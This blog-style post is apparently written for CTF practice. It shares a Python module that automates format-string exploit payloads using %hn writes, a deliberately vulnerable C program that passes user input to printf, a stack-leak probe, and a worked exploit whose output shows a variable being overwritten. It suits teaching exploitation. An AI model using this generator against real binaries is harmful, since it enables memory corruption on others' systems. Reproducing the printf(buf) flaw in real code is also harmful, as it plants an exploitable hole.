I have written small module in python where we can automate the “format string vulnerability”.
Most of the time when i find format string vulnerability binaries in CTF’s i kept on doing the small scripting part again and again, so i have decided to write a module that keeps the work simple.
import struct def p32(val): return str(struct.pack("<I", val)) def makepayload(leak, addr, offset): upper = int((leak)[2:6],16) lower = int((leak)[6:10],16) if (upper <= lower): payload = p32(addr + 2)+p32(addr)+"%"+str(upper-8) +"x%"+ offset + "$hn"+"%"+str(abs(lower-upper))+ "x%" + str(int(offset) + 1) + "$hn" else: payload = p32(addr)+p32(addr + 2)+"%"+str(lower-8) +"x%" + offset +"$hn"+"%"+str(abs(upper-lower))+"x%" + str(int(offset) + 1) +"$hn" return payload
You can just import this and attack the binary, any ways i will try to demonstrate using small example.
#include int data; int main(int argc, char **argv){ data = 0; if(argc != 2){ printf("Enter argument\n"); return 0; } char buf[100]; strncpy(buf, argv[1],100); printf(buf); if(data == 0) printf("Data not changed\n"); else printf("Data changed!!!\n"); return 0; }
In this binary i am just aiming to change the value of global variable data using the vulnerable “printf”.
➜ module ./try $(python -c 'print "A"*4 + "-%x"*10') AAAA-ffdef99e-64-ffdef0a4-41414141-2d78252d-252d7825-78252d78-2d78252d-252d7825-78252d78Data not changed
So here i can read stack and could read the input AAAA at 4th position and using gdb i can found out the address of data.
Here is the exploit.
import format payload = format.makepayload('0x00000100', 0x0804a030, '4') value address of data offset print payload
Here is the output
➜ module python exploit.py 2�0�%-8x%4$hn%256x%5$hn ➜ module ./try $(python exploit.py) 2�0�ffdee9a5 64Data changed!!!